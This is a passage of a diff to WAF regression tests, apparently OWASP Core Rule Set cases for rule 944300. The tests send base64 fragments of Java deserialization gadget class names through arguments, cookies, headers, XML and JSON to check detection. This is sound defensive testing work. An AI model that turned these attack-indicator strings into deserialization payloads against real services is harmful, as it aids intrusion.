"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-151 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_id: 151 desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-152 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_id: 152 desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-153 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_id: 153 desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-154 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_id: 154 desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-155 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 155 desc: "Argument test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-156 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 156 desc: "Argument name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-157 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_id: 157 desc: "Cookie test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BpbnN0YW50aWF0ZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-158 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 158 desc: "Cookie name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-159 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 159 desc: "Request header test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnN0YW50aWF0ZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-160 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 160 desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-161 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 161 desc: "XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-162 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 162 desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-163 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 163 desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-164 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 164 desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-165 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" + output: + log_contains: "id \"944300\"" + - test_id: 165 desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-166 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 166 desc: "Argument test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-167 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 167 desc: "Argument name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-168 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_id: 168 desc: "Cookie test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-169 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 169 desc: "Cookie name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-170 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 170 desc: "Request header test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-171 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 171 desc: "XML attribute value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-172 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 172 desc: "XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-173 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 173 desc: "Nested XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-174 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 174 desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-175 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 175 desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-176 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 